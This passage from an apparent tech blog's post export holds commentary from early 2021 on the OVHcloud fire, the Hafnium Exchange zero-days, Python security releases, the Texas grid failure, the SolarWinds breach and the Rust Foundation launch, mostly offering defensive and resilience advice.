GPUs across workloads, the cost per inference will continue to drop.\nMy Take # NVIDIA\u0026rsquo;s GTC keynote was impressive but also a bit overwhelming — Jensen announced enough products and platforms to fill a week of presentations, compressed into a two-hour kitchen tour. The company\u0026rsquo;s ambition is clear: they want to own the entire AI computing stack, from silicon to software platform.\nWhether that\u0026rsquo;s good for the industry depends on your perspective. NVIDIA\u0026rsquo;s CUDA ecosystem has been incredibly enabling, but it\u0026rsquo;s also created significant vendor lock-in. The Grace CPU move extends that potential lock-in from GPUs to the entire server platform.\nFor now, though, the practical takeaway is this: if you\u0026rsquo;re running AI inference workloads, the tooling and hardware options are better and cheaper than they were a year ago, and that trend is accelerating. If you\u0026rsquo;re not running AI workloads yet but you\u0026rsquo;re building applications that could benefit from them, the barrier to entry is dropping fast. That\u0026rsquo;s worth paying attention to, regardless of how you feel about leather jackets and kitchen keynotes.\n","date":"18 March 2021","externalUrl":null,"permalink":"/posts/210318-nvidia-gtc-2021-grace-cpu/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"NVIDIA’s GTC keynote reveals new hardware and software ambitions that signal where AI infrastructure is heading — and what developers should pay attention to.","title":"NVIDIA GTC 2021 — GPUs, Grace, and the AI Infrastructure Arms Race","type":"posts"},{"content":"Yesterday morning, a fire broke out at OVHcloud\u0026rsquo;s SBG2 datacenter in Strasbourg, France. It didn\u0026rsquo;t just damage the facility — it destroyed it entirely, along with a significant portion of the adjacent SBG1 building. SBG3 and SBG4 were taken offline as a precaution. In one night, a substantial chunk of Europe\u0026rsquo;s largest cloud provider went up in smoke. Literally.\nThe images circulating on social media are remarkable. The entire five-story SBG2 building engulfed in flames, the metal structure glowing orange against the night sky. No injuries reported, thankfully, but the data losses are already proving catastrophic for many customers.\nOVHcloud founder Octave Klaba has been posting updates on Twitter with admirable transparency, but the reality is grim: SBG2 is a total loss. For customers whose data lived exclusively in that facility, with no off-site backups, it\u0026rsquo;s gone. Permanently.\nThe Blast Radius # OVHcloud hosts approximately 1.5 million websites across its infrastructure. The Strasbourg campus was one of their major European hubs. In the hours since the fire, we\u0026rsquo;ve seen:\nGovernment agencies in France with services offline The Centre Pompidou\u0026rsquo;s website down Multiple game servers (Rust players are particularly vocal) wiped entirely Cryptocurrency platforms, e-commerce sites, and SaaS applications offline data.gouv.fr, the French government\u0026rsquo;s open data platform, inaccessible Octave Klaba has stated that SBG1 and SBG4 should be partially restored within one to two weeks, and SBG3 within two weeks. SBG2 will not be restored — it no longer exists. For customers with data replicated across availability zones, recovery is possible. For those without\u0026hellip; the conversations happening right now must be brutal.\nThe Shared Responsibility Misunderstanding # This event exposes what I consider the cloud industry\u0026rsquo;s original sin: the persistent, widespread misunderstanding of the shared responsibility model.\nWhen you buy a bare metal server or a VPS from OVHcloud (or any provider), you\u0026rsquo;re buying compute and network. You are not buying disaster recovery. You are not buying backups. You are not buying geographic redundancy. These are available as additional services, and OVHcloud offers them, but they\u0026rsquo;re not default.\nThe problem is that \u0026ldquo;cloud\u0026rdquo; has become synonymous with \u0026ldquo;resilient\u0026rdquo; in many people\u0026rsquo;s minds. Marketing language about \u0026ldquo;enterprise-grade infrastructure\u0026rdquo; and \u0026ldquo;99.99% uptime SLAs\u0026rdquo; creates an expectation that the provider handles everything. But an SLA is a financial agreement about service credits — it\u0026rsquo;s not a guarantee that your data survives a building fire.\nI\u0026rsquo;ve had this conversation with clients more times than I can count. \u0026ldquo;But it\u0026rsquo;s in the cloud!\u0026rdquo; Yes, and \u0026ldquo;the cloud\u0026rdquo; is a computer in someone else\u0026rsquo;s building. Buildings can flood, lose power, or — as we\u0026rsquo;ve just been reminded — catch fire.\nBackup Lessons (Again) # The 3-2-1 backup rule has been around for decades, and it exists precisely for moments like this:\n3 copies of your data 2 different storage media 1 off-site copy If your production database lives on an OVHcloud VPS in Strasbourg, and your only backup is a snapshot stored\u0026hellip; on OVHcloud\u0026rsquo;s infrastructure in Strasbourg, you don\u0026rsquo;t have a backup. You have two copies in the same blast radius.\nFor anyone reassessing their backup strategy after this wake-up call:\nAutomate off-site backups. Use restic, borgbackup, or similar tools to push encrypted backups to a geographically separate location. S3-compatible storage in a different region is cheap and effective. Test your restores. A backup you\u0026rsquo;ve never restored is Schrödinger\u0026rsquo;s backup — it both works and doesn\u0026rsquo;t work until you try. Schedule monthly restore tests. Document your recovery procedure. When everything is on fire (perhaps literally), you don\u0026rsquo;t want to be figuring out the restore process from scratch. Consider your RPO and RTO. Recovery Point Objective (how much data can you afford to lose) and Recovery Time Objective (how long can you be down) should drive your backup frequency and infrastructure choices. Multi-Region Is Not Optional # For production workloads that matter, single-datacenter deployment is a calculated risk. Sometimes that calculation makes sense — not every application justifies the complexity and cost of multi-region architecture. A personal blog, a staging environment, an internal tool used by five people — fine, single region.\nBut if your business depends on it, you need geographic redundancy. And not \u0026ldquo;two availability zones in the same campus\u0026rdquo; redundancy — actual geographic separation. OVHcloud\u0026rsquo;s SBG1 through SBG4 are all on the same campus in Strasbourg. Adjacent buildings. When one caught fire, they all went down.\nThis is where the major hyperscalers (AWS, Azure, GCP) have a structural advantage. Their region model, with availability zones that are physically separate facilities with independent power and cooling, provides genuine isolation. OVHcloud and other European providers have been building out similar capabilities, but the Strasbourg campus design clearly didn\u0026rsquo;t provide the isolation customers assumed.\nMy Take # I feel for the OVHcloud team and their customers. Octave Klaba\u0026rsquo;s transparency has been exemplary — real-time updates, honest assessments, no corporate spin. That\u0026rsquo;s how you handle a crisis.\nBut I also feel frustrated, because this conversation happens after every major outage. We collectively express shock, write blog posts about backup strategies, and then slowly drift back to complacency until the next incident. I watched the same cycle after the 2017 OVH Strasbourg flood, after S3\u0026rsquo;s 2017 outage, after every significant infrastructure failure.\nThe lesson isn\u0026rsquo;t complicated: your data is your responsibility. Cloud providers sell infrastructure, not peace of mind. If you\u0026rsquo;re reading this and you\u0026rsquo;re not sure whether your backups would survive your primary datacenter being physically destroyed, that\u0026rsquo;s your action item for today. Not tomorrow. Today.\n","date":"11 March 2021","externalUrl":null,"permalink":"/posts/210311-ovhcloud-datacenter-fire/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A catastrophic fire at OVHcloud’s Strasbourg datacenter destroys thousands of servers and raises hard questions about cloud resilience and backup strategies.","title":"OVHcloud Strasbourg Fire — When 'The Cloud' Literally Burns Down","type":"posts"},{"content":"If you run on-premises Microsoft Exchange servers — or more critically, if your clients do — stop reading this and go patch. Seriously. Then come back.\nOn Tuesday, Microsoft released emergency out-of-band security updates for four zero-day vulnerabilities in Exchange Server 2013, 2016, and 2019. These aren\u0026rsquo;t theoretical. They\u0026rsquo;re being actively exploited in the wild by a state-sponsored group Microsoft has dubbed \u0026ldquo;Hafnium,\u0026rdquo; believed to be operating out of China. And the scale of this thing is staggering. This follows the pattern of large-scale supply chain compromise that the industry is still reeling from.\nThe vulnerabilities — CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 — can be chained together to achieve unauthenticated remote code execution on any internet-facing Exchange server. An attacker can read emails, plant web shells for persistent access, and move laterally through your network. All without credentials.\nHow the Attack Chain Works # The chain starts with CVE-2021-26855, a server-side request forgery (SSRF) vulnerability that allows an attacker to send arbitrary HTTP requests and authenticate as the Exchange server itself. This is the initial foothold — no authentication required, just an HTTPS connection to port 443.\nFrom there, CVE-2021-26857 exploits an insecure deserialization vulnerability in the Unified Messaging service. If that service is enabled (it often is), the attacker gains SYSTEM-level code execution. The remaining two CVEs provide post-authentication arbitrary file write capabilities, which are being used to drop web shells — typically in accessible directories like C:\\inetpub\\wwwroot\\aspnet_client\\.\nWhat makes this particularly nasty is the simplicity. The SSRF vulnerability means any Exchange server with Outlook Web Access (OWA) exposed to the internet is a target. And there are hundreds of thousands of these servers. Volexity, who discovered the initial exploitation, reports seeing activity going back to at least January 6, 2021. That\u0026rsquo;s nearly two months of active exploitation before patches were available.\nThe Scale Problem # Reports are already suggesting that at least 30,000 organizations in the United States alone have been compromised, and that number is likely to grow significantly. Brian Krebs is reporting that the attackers appeared to dramatically increase their scanning and exploitation activity in the days before the patches dropped, as if they knew the window was closing. The sheer scale mirrors the impact of SolarWinds and other systemic breaches that affect hundreds of thousands of organizations simultaneously.\nThis raises uncomfortable questions about the disclosure timeline. Microsoft was notified of the vulnerability by Volexity and DEVCORE in early January, but patches didn\u0026rsquo;t ship until March 2. In the intervening two months, exploitation went from targeted to broad. Whether the attackers learned of the impending patches through their own intelligence or whether there was a leak in the disclosure process is an open question.\nFor smaller organizations — the ones without dedicated security teams — this is a catastrophe in slow motion. Many are running Exchange precisely because they don\u0026rsquo;t have the resources for complex cloud migrations. They\u0026rsquo;re now expected to not only patch but also forensically examine their servers for web shells, check for signs of lateral movement, and potentially rebuild compromised systems. That\u0026rsquo;s a tall order for a two-person IT shop. The incident response burden shows exactly why supply chain security matters — when critical infrastructure is compromised, the cascading cleanup affects thousands of organizations.\nThe Cloud Migration Argument (and Its Limits) # The inevitable take is already circulating: \u0026ldquo;This wouldn\u0026rsquo;t have happened on Exchange Online.\u0026rdquo; And it\u0026rsquo;s technically true — Exchange Online (Microsoft 365) is not affected by these vulnerabilities. Microsoft manages the infrastructure, applies patches immediately, and handles the security monitoring.\nBut let\u0026rsquo;s not pretend cloud migration is a simple solution for everyone. Organizations run on-premises Exchange for reasons: regulatory requirements, data sovereignty concerns, legacy integrations, or simply because the per-user-per-month cost of Microsoft 365 doesn\u0026rsquo;t work for their budget. Telling a 200-person nonprofit to \u0026ldquo;just move to the cloud\u0026rdquo; after they\u0026rsquo;ve been breached is not helpful.\nThat said, this incident will absolutely accelerate Exchange Online migrations. The operational burden of running your own email infrastructure was already hard to justify, and this tips the scales further. If you can\u0026rsquo;t patch four zero-days within hours of disclosure, you probably shouldn\u0026rsquo;t be running the server yourself.\nWhat To Do Right Now # If you\u0026rsquo;re responsible for Exchange servers:\nPatch immediately. Updates are available for Exchange 2013 CU23, 2016 CU18/CU19, and 2019 CU7/CU8. Run Microsoft\u0026rsquo;s detection script. They\u0026rsquo;ve published a PowerShell script that checks for known indicators of compromise. Search for web shells. Check C:\\inetpub\\wwwroot\\aspnet_client\\ and your Exchange installation directories for unexpected .aspx files. Check OAB virtual directory configurations. Attackers are modifying these to point to their web shells. Assume compromise. If your server was internet-facing and unpatched before March 2, treat it as compromised until you can prove otherwise. My Take # We\u0026rsquo;re barely three months past the SolarWinds disclosure, and here we are again. Different attack vector, different actors, but the same fundamental problem: critical infrastructure running software that\u0026rsquo;s difficult to patch quickly, managed by teams that are stretched thin.\nI\u0026rsquo;ve spent three decades watching the industry slowly move toward \u0026ldquo;someone else\u0026rsquo;s problem\u0026rdquo; as a security model — whether that\u0026rsquo;s managed services, cloud platforms, or SaaS. For all the valid criticisms of that approach, incidents like this make the case more eloquently than any sales pitch could.\nThe Hafnium attack is going to be a defining cybersecurity event of 2021. The number of compromised organizations is enormous, and the cleanup will take months. If you\u0026rsquo;re in a position to help — especially smaller organizations without security expertise — now is the time.\n","date":"4 March 2021","externalUrl":null,"permalink":"/posts/210304-microsoft-exchange-hafnium-zero-day/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Four zero-day vulnerabilities in Microsoft Exchange Server are being actively exploited at scale, and the fallout is only beginning.","title":"Hafnium and the Microsoft Exchange Zero-Days — A Supply Chain Nightmare Unfolds","type":"posts"},{"content":"This week the Python core team shipped Python 3.9.2 and 3.8.8, both classified as security releases. While point releases rarely make headlines, these two address a handful of CVEs that are worth paying attention to — particularly if you\u0026rsquo;re running Python in production, which, let\u0026rsquo;s be honest, most of us are at this point.\nThe timing is notable. We\u0026rsquo;re still processing the implications of the SolarWinds supply chain attack, congressional hearings wrapped up just yesterday, and the entire industry is looking at its dependency chains with fresh eyes. Python, as the backbone of everything from machine learning pipelines to infrastructure automation, sits squarely in the crosshairs.\nWhat Got Fixed # The most significant fix addresses CVE-2021-3177, a buffer overflow in the ctypes module\u0026rsquo;s PyCArg_repr function. This is the kind of vulnerability that doesn\u0026rsquo;t sound exciting until you realize how many C extension bindings use ctypes under the hood. A crafted floating-point value could trigger a stack buffer overflow — classic C memory safety issue bleeding through Python\u0026rsquo;s abstraction layer.\nThere\u0026rsquo;s also a fix for urllib.parse that addresses potential web cache poisoning attacks, and several updates to the bundled pip and setuptools versions. None of these are \u0026ldquo;drop everything\u0026rdquo; emergencies in isolation, but taken together, they paint a picture of a project that\u0026rsquo;s taking security seriously.\nWhat I find encouraging is the cadence. Python 3.9.1 came out in December, and here we are in February with 3.9.2. The team is shipping security fixes quickly, and the release notes are thorough. Compare this to how Python security updates worked even five years ago, and the improvement is stark.\nThe Supply Chain Angle # I\u0026rsquo;ve been doing this long enough to remember when nobody thought twice about pip install whatever on a production machine. Those days are over, or at least they should be. The Python Packaging Authority (PyPA) has been making steady progress on improving the security of the packaging ecosystem — hash checking, pip\u0026rsquo;s dependency resolver rewrite (which shipped in pip 20.3), and ongoing work on PEP 458 for TUF integration with PyPI.\nBut there\u0026rsquo;s still a gap. Most teams I work with have decent CI/CD pipelines, but their Python dependency management is an afterthought. requirements.txt with unpinned versions, no hash verification, no private index for internal packages. After SolarWinds, and especially after the dependency confusion research that Alex Birsan published earlier this month, this feels increasingly reckless.\nIf you haven\u0026rsquo;t already, now is a good time to:\nPin your dependencies with exact versions Use pip\u0026rsquo;s --require-hashes flag in production builds Set up a private package index (even a simple one like devpi) to control what gets installed Run Safety or pip-audit in your CI pipeline Python\u0026rsquo;s Position in 2021 # Looking at the broader picture, Python is in an interesting position right now. It topped the TIOBE index again in February, which is one of those metrics that means both everything and nothing. More meaningfully, the ecosystem is maturing in ways that matter for production use. The security posture has improved considerably since Python 2\u0026rsquo;s EOL transition.\nType hints have been steadily improving with Python 3.9\u0026rsquo;s direct generic type usage, and this continues with Python 3.10\u0026rsquo;s pattern matching. I\u0026rsquo;ve been gradually adding type annotations to a large codebase at work, and the combination of mypy and a well-typed codebase genuinely catches bugs. Not hypothetical bugs — real ones that would have shipped.\nThe performance story is also evolving. CPython\u0026rsquo;s \u0026ldquo;faster CPython\u0026rdquo; project led by Mark Shannon (and now backed by Microsoft, after Guido van Rossum joined them) is targeting significant speedups for 3.11. That\u0026rsquo;s still a ways off, but the commitment is there.\nAnd then there\u0026rsquo;s the data science and ML ecosystem, which continues to be Python\u0026rsquo;s killer app. With frameworks like FastAPI gaining traction for serving ML models, and tools like Poetry and Pipenv improving dependency management, the gap between \u0026ldquo;Python for prototyping\u0026rdquo; and \u0026ldquo;Python for production\u0026rdquo; keeps narrowing.\nMy Take # I\u0026rsquo;ve been writing Python since the 2.3 days, and the language\u0026rsquo;s evolution has been remarkable. Not because of flashy features — Python has always been conservative about syntax changes (the walrus operator debate proved that) — but because the ecosystem around it has professionalized.\nThese security releases are a small but important example. The Python core team is responding to vulnerabilities quickly, the CVE process is working, and the community is taking supply chain security more seriously. After watching the Perl ecosystem slowly fade partly due to neglect of exactly these kinds of concerns, I don\u0026rsquo;t take it for granted.\nIf you\u0026rsquo;re running Python 3.8 or 3.9 in production, update. If you\u0026rsquo;re still on 3.6 or 3.7, start planning your migration — 3.6 reached end-of-life in December 2020, and 3.7 is next. And regardless of your version, take another look at your dependency management practices. The threat landscape has changed, and our tooling needs to keep up.\n","date":"25 February 2021","externalUrl":null,"permalink":"/posts/210225-python-392-security-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python’s latest security releases fix critical vulnerabilities and highlight the increasingly professional security posture of the Python ecosystem.","title":"Python 3.9.2 and 3.8.8 — Security Patches and the Maturing Python Ecosystem","type":"posts"},{"content":"As I write this, millions of people in Texas are without power in the middle of a historic winter storm. Temperatures have plunged to levels the state\u0026rsquo;s infrastructure was never designed to handle, and the electrical grid — operated independently from the rest of the continental US by ERCOT — has failed catastrophically. Rolling blackouts that were supposed to last 45 minutes have stretched into days. People are burning furniture for warmth. It\u0026rsquo;s a humanitarian crisis.\nBut it\u0026rsquo;s also an infrastructure crisis with direct implications for the tech industry. Texas hosts a significant concentration of data centers, particularly in the Dallas-Fort Worth area and San Antonio. And this week, we\u0026rsquo;re seeing what happens when the physical layer that our digital infrastructure depends on simply stops working.\nThe Data Center Impact # Multiple data center operators in Texas have reported disruptions. Some facilities have switched to diesel generator backup, which works — until you run out of fuel and the roads are too icy for delivery trucks. Others have experienced cooling failures as HVAC systems struggle with the sustained cold and power instability.\nCloud providers with Texas presence have been largely transparent about the situation. AWS reported some impact to services in the US-East-1 region (Virginia) as well, partly due to cascading effects from interconnected networks. Google Cloud and Microsoft Azure have both acknowledged elevated error rates for some customers with Texas-based resources.\nThe irony isn\u0026rsquo;t lost on me: data centers are typically designed to handle heat, not cold. Cooling is usually the primary environmental concern. But when outside temperatures drop below what the building systems were designed for, water pipes freeze, diesel fuel gels, and mechanical systems that have never been tested at -15°C start failing in unexpected ways.\nMulti-Region Isn\u0026rsquo;t Optional Anymore # If you\u0026rsquo;re running production workloads in a single region — any single region — the Texas crisis should be your wake-up call. I\u0026rsquo;ve had this conversation with engineering teams more times than I can count: \u0026ldquo;We don\u0026rsquo;t need multi-region, we\u0026rsquo;re in us-east-1 and it\u0026rsquo;s reliable.\u0026rdquo; Or, \u0026ldquo;Multi-region is too expensive and complex for our scale.\u0026rdquo;\nThe cost calculation changes dramatically when you factor in the probability of extended outages. Single-region deployments are a bet that your chosen region won\u0026rsquo;t experience a significant disruption during the lifetime of your service. The Texas power crisis, the 2017 AWS S3 outage, and the 2020 Cloudflare backbone issues all demonstrate that this bet is riskier than many teams assume.\nMulti-region doesn\u0026rsquo;t have to mean active-active replication of everything. A practical starting point for many applications:\nDNS-based failover with health checks that route traffic away from an unhealthy region Database read replicas in a secondary region that can be promoted if needed Static assets and CDN already serve from multiple points of presence — make sure your application can degrade gracefully if the primary API is unavailable Infrastructure as Code that allows you to spin up a complete environment in a new region within hours, not days The key insight is that multi-region resilience is a spectrum, not a binary choice. Even basic preparations — tested backups in a different region, documented runbooks for regional failover, regular disaster recovery drills — dramatically improve your resilience posture.\nThe Physical Layer We Forget About # Working in cloud and DevOps, it\u0026rsquo;s easy to develop an abstraction mindset. We think in terms of regions, availability zones, managed services, and auto-scaling groups. The Texas crisis is a stark reminder that all of those abstractions run on physical machines, in physical buildings, powered by physical electrical grids, cooled by physical HVAC systems.\nI remember working on a project years ago where we specified that our disaster recovery site needed to be in a different seismic zone from our primary data center. The facilities team thought we were being paranoid. But the principle is sound: your failure modes should be as uncorrelated as possible. If both your primary and backup are in the same power grid, or the same flood plain, or the same hurricane path, your redundancy provides less protection than you think.\nThe Texas power grid\u0026rsquo;s isolation — ERCOT operates independently from the Eastern and Western Interconnections — was designed for regulatory autonomy. But it also means Texas can\u0026rsquo;t easily import power from neighboring states during a crisis. There\u0026rsquo;s a lesson there for system design: isolation provides independence, but it also limits your options during failure. Sound familiar? It\u0026rsquo;s the same trade-off we navigate with microservice architectures, network segmentation, and blast radius management.\nInfrastructure as Code and Disaster Recovery # One practical outcome of this crisis should be renewed attention to disaster recovery testing. I\u0026rsquo;m consistently surprised by how many organizations have disaster recovery plans that have never been actually tested. A runbook that says \u0026ldquo;fail over to us-west-2\u0026rdquo; is worthless if nobody has ever executed it end-to-end.\nIf you\u0026rsquo;re using Terraform, CloudFormation, or Pulumi, you have the foundation for reproducible infrastructure. The question is: can you actually deploy your full stack in a new region from scratch? What manual steps are hidden in your \u0026ldquo;automated\u0026rdquo; process? What state or data needs to migrate? What DNS changes need to propagate?\nI\u0026rsquo;d recommend scheduling a quarterly \u0026ldquo;region evacuation\u0026rdquo; drill where you actually deploy your application to a secondary region and route a percentage of test traffic to it. The first time you do this, you\u0026rsquo;ll discover a dozen things that don\u0026rsquo;t work. That\u0026rsquo;s the point — finding those gaps during a drill, not during a crisis.\nMy Take # The Texas power crisis is primarily a human tragedy, and my thoughts are with the people affected. But for those of us who build and operate digital infrastructure, it\u0026rsquo;s also an urgent reminder that our systems exist in the physical world.\nCloud providers have done remarkable work abstracting away physical infrastructure concerns, but abstraction doesn\u0026rsquo;t eliminate risk — it just moves it out of sight. When the grid fails, the abstractions fail with it.\nIf your team hasn\u0026rsquo;t reviewed its regional resilience strategy recently, this week is a good time to start. And if your disaster recovery plan lives in a document that nobody has read since it was written, it\u0026rsquo;s time to dust it off and actually test it. The next crisis won\u0026rsquo;t give you advance warning.\n","date":"18 February 2021","externalUrl":null,"permalink":"/posts/210218-texas-grid-cloud-resilience/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Texas power grid failure is knocking out data centers and cloud services, offering hard lessons about infrastructure resilience, multi-region architecture, and the physical realities underlying our digital systems.","title":"When the Grid Goes Down — Cloud Resilience Lessons from the Texas Power Crisis","type":"posts"},{"content":"It\u0026rsquo;s been roughly three months since FireEye first disclosed the SolarWinds supply chain attack in December, and the picture keeps getting worse. This week, the new Biden administration signaled that investigating and responding to the breach is a top cybersecurity priority. Congressional hearings are underway. And security researchers continue to discover new details about the sophistication of the operation. As someone who\u0026rsquo;s been building and deploying software for three decades, I can say without hyperbole: this is the most consequential software supply chain attack we\u0026rsquo;ve ever seen, and the lessons it teaches should reshape how every engineering organization thinks about trust.\nThe Scale We\u0026rsquo;re Still Uncovering # For those who haven\u0026rsquo;t been tracking the details closely, here\u0026rsquo;s where things stand. The attackers — widely attributed to Russian intelligence services — compromised SolarWinds\u0026rsquo; build pipeline for the Orion network management platform. They inserted a backdoor (dubbed SUNBURST) into legitimate software updates that were then distributed to roughly 18,000 organizations. Among the confirmed victims: the US Treasury, Commerce Department, Department of Homeland Security, Microsoft, and numerous private companies.\nWhat makes this particularly alarming is the patience and sophistication involved. The attackers had access to SolarWinds\u0026rsquo; build infrastructure for months before activating the backdoor. The malicious code was designed to blend in with legitimate Orion code patterns. It even checked for security tools and sandboxes before activating, and used domain generation algorithms that mimicked normal SolarWinds traffic patterns.\nThis week, researchers at CrowdStrike identified a third malware strain — SUNSPOT — that was specifically designed to monitor SolarWinds\u0026rsquo; build processes and inject the SUNBURST backdoor at compile time. The attacker wasn\u0026rsquo;t just modifying source code; they were modifying the build system itself, so the source repository looked clean while the compiled artifacts were compromised.\nWhy Build Pipeline Security Is Fundamentally Hard # The SUNSPOT discovery cuts to the heart of a problem that most organizations barely think about: the integrity of the build pipeline. We obsess over source code reviews, static analysis, and dependency scanning — all important — but how many teams verify that their compiled artifacts actually correspond to the reviewed source code?\nIn most CI/CD pipelines, the build environment is a trusted black box. Jenkins, GitHub Actions, GitLab CI, Azure DevOps — these systems have extensive access to source code, secrets, and deployment credentials. If an attacker compromises the build environment, they can inject anything into the final artifact, and standard code review processes won\u0026rsquo;t catch it.\nThis is where the concept of reproducible builds becomes critically important. A reproducible build means that given the same source code, build tools, and environment specification, you get bit-for-bit identical output. If builds are reproducible, you can independently verify that a binary was built from the claimed source code. Projects like Debian have been working on reproducible builds for years, but adoption across the industry remains limited.\nThe related concept is build provenance — cryptographic attestation of where, when, and how a software artifact was built. Google\u0026rsquo;s Binary Authorization for GKE is one implementation of this idea, but we need industry-wide standards and tooling to make it practical.\nDependencies: The Attack Surface We Keep Ignoring # SolarWinds also highlights the dependency trust problem that pervades modern software development. Every organization that installed the compromised Orion update did so through their normal, trusted software update channel. They had no reason to suspect it — the update was signed with SolarWinds\u0026rsquo; legitimate certificate.\nThis pattern of trust extends throughout our dependency chains. When you run npm install or pip install, you\u0026rsquo;re trusting thousands of transitive dependencies, each maintained by different individuals or teams, distributed through package registries with varying levels of security. We\u0026rsquo;ve seen smaller-scale supply chain attacks in the npm ecosystem (event-stream in 2018) and the Python ecosystem (typosquatting attacks on PyPI).\nThe difference with SolarWinds is scale and sophistication, but the underlying vulnerability is the same: we implicitly trust our software supply chain in ways that aren\u0026rsquo;t justified by the security measures in place.\nPractical Steps for Engineering Teams # So what do we actually do about this? Here are concrete measures that I think are worth investing in:\nAudit your build pipeline access. Who has write access to your CI/CD configuration? What secrets are available during builds? Can a compromised build step exfiltrate credentials? Most teams have never done a thorough threat model of their build system.\nPin and verify dependencies. Use lock files, pin exact versions, and verify checksums. Tools like Dependabot and Renovate can automate dependency updates while maintaining pinning discipline.\nImplement artifact signing. Sign your build artifacts and verify signatures before deployment. Projects like sigstore (which is just getting started) aim to make this easier.\nAdopt least-privilege for CI/CD. Your build pipeline should not have production deployment credentials unless it\u0026rsquo;s actually deploying. Separate build, test, and deployment stages with distinct permissions.\nMonitor for anomalies. Network monitoring, log analysis, and behavioral detection should cover your build infrastructure, not just your production environment.\nMy Take # The SolarWinds breach is a watershed moment for software supply chain security. It demonstrated that even well-resourced organizations with dedicated security teams can be compromised through their trusted software vendors. The attack vector wasn\u0026rsquo;t a zero-day exploit or a phishing email — it was a routine software update.\nI\u0026rsquo;ve been arguing for years that our industry underinvests in build pipeline security relative to its importance. The build system is one of the most privileged components in any organization — it touches source code, secrets, and deployment infrastructure — yet it often receives less security scrutiny than a customer-facing web application.\nThe positive outcome, if there is one, is that SolarWinds has made supply chain security impossible to ignore. I expect to see significant investment in build provenance, reproducible builds, and dependency verification tooling over the coming years. The question is whether we\u0026rsquo;ll sustain that attention or let it fade once the headlines move on. Given my experience with how the industry responds to wake-up calls, I\u0026rsquo;m hopeful but realistic — lasting change requires sustained effort, not just momentary alarm.\n","date":"11 February 2021","externalUrl":null,"permalink":"/posts/210211-solarwinds-supply-chain-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Three months after the SolarWinds breach disclosure, the full scope is still unfolding and the implications for software supply chain security demand fundamental changes in how we build and deploy software.","title":"SolarWinds Three Months Later — Rethinking Software Supply Chain Security","type":"posts"},{"content":"On February 8th — just days from now — the Rust Foundation will officially launch, backed by five founding corporate members: AWS, Google, Huawei, Microsoft, and Mozilla. This has been a long time coming, and for anyone who\u0026rsquo;s been following Rust\u0026rsquo;s journey from a Mozilla Research side project to one of the most loved programming languages in the world, it\u0026rsquo;s a significant milestone. But it\u0026rsquo;s also a moment worth examining carefully, because the structure and governance of open-source foundations matter enormously for a language\u0026rsquo;s long-term health. Rust\u0026rsquo;s growing significance in systems programming would later be demonstrated when the Linux kernel began integrating Rust as a first-class systems language.\nWhy a Foundation Now? # The immediate catalyst was Mozilla\u0026rsquo;s financial crisis. In August 2020, Mozilla laid off approximately 250 employees, including several members of the Rust team. While Rust\u0026rsquo;s development didn\u0026rsquo;t grind to a halt — much of the work is done by volunteers and contributors employed by other companies — the layoffs exposed a critical dependency. Having a programming language\u0026rsquo;s institutional home inside a single company, even a mission-driven one like Mozilla, creates a single point of failure.\nThe Rust core team had been discussing the need for an independent foundation for years. The Mozilla layoffs turned that discussion into urgent action. The new foundation will hold the trademarks, domain names, and other assets, and will provide financial support for the project\u0026rsquo;s infrastructure — CI systems, crates.io hosting, and the other operational necessities that keep the ecosystem running.\nWhat\u0026rsquo;s notable about the founding members is their diversity. AWS, Google, Microsoft, and Huawei are all significant consumers of Rust internally, and they each have different strategic interests in the language. This isn\u0026rsquo;t a single-vendor foundation — it\u0026rsquo;s a genuine multi-stakeholder arrangement, which bodes well for balanced governance.\nRust\u0026rsquo;s Trajectory in 2021 # Even before the foundation announcement, Rust has been on a remarkable trajectory. The 2020 Stack Overflow Developer Survey marked the fifth consecutive year that Rust was voted the most loved programming language. But \u0026ldquo;loved\u0026rdquo; and \u0026ldquo;adopted\u0026rdquo; are different things, and Rust\u0026rsquo;s adoption story is where things get really interesting.\nIn the past year, we\u0026rsquo;ve seen Rust move beyond its traditional strongholds of systems programming and WebAssembly into new domains:\nCloud infrastructure: AWS has been building Rust-based services like Firecracker (the microVM behind Lambda and Fargate) and Bottlerocket (a container-optimized Linux distribution). Operating systems: Microsoft has been experimenting with Rust in Windows, and Google recently announced it would support Rust for Android system-level development. Networking: The Tokio async runtime has matured significantly, making Rust competitive for high-performance network services. As someone who\u0026rsquo;s spent most of my career working with C, C++, and later higher-level languages like Python and Node.js, I\u0026rsquo;ve watched Rust\u0026rsquo;s approach to memory safety with genuine admiration. The borrow checker is famously steep to learn, but once you internalize the model, the guarantees it provides are transformative. No more use-after-free. No more data races. These aren\u0026rsquo;t theoretical benefits — they\u0026rsquo;re classes of bugs that I\u0026rsquo;ve personally spent weeks tracking down in C codebases over the years.\nWhat the Foundation Needs to Get Right # Foundations can be tremendous assets to open-source projects, but they can also become bureaucratic overhead that slows things down. The Rust Foundation needs to navigate several challenges:\nMaintain contributor autonomy. Rust\u0026rsquo;s development has always been driven by an RFC process and a system of teams with clear ownership areas. The foundation should support this structure, not try to centralize decision-making. The founding charter suggests this is the intent, but intentions and outcomes don\u0026rsquo;t always align.\nBalance corporate and community interests. The founding members are all large corporations. Rust\u0026rsquo;s community includes many independent developers, hobbyists, and small-company users who might feel that corporate priorities will dominate. The foundation\u0026rsquo;s board structure — which includes both corporate and community directors — is designed to address this, but it will take active effort to keep the balance genuine.\nFund the unglamorous work. The most impactful work a foundation can do often isn\u0026rsquo;t flashy. It\u0026rsquo;s paying for CI infrastructure, ensuring crates.io remains reliable, funding documentation improvements, and supporting the moderation team. These are the things that keep an ecosystem healthy but rarely attract corporate sponsorship on their own.\nThe Broader Open-Source Governance Lesson # The Rust Foundation\u0026rsquo;s creation follows a pattern we\u0026rsquo;ve seen with other major open-source projects: Node.js (which moved from Joyent to the OpenJS Foundation), Kubernetes (which lives under the CNCF), and .NET (managed by the .NET Foundation). Each of these transitions taught us something about how open-source governance evolves as projects mature.\nThe common thread is that successful open-source projects eventually outgrow any single sponsor. The question isn\u0026rsquo;t whether a project needs independent governance — it\u0026rsquo;s whether that governance is established proactively (as with Rust) or reactively after a crisis. Rust is handling this transition relatively well, given the circumstances.\nMy Take # I\u0026rsquo;m cautiously optimistic about the Rust Foundation. The founding 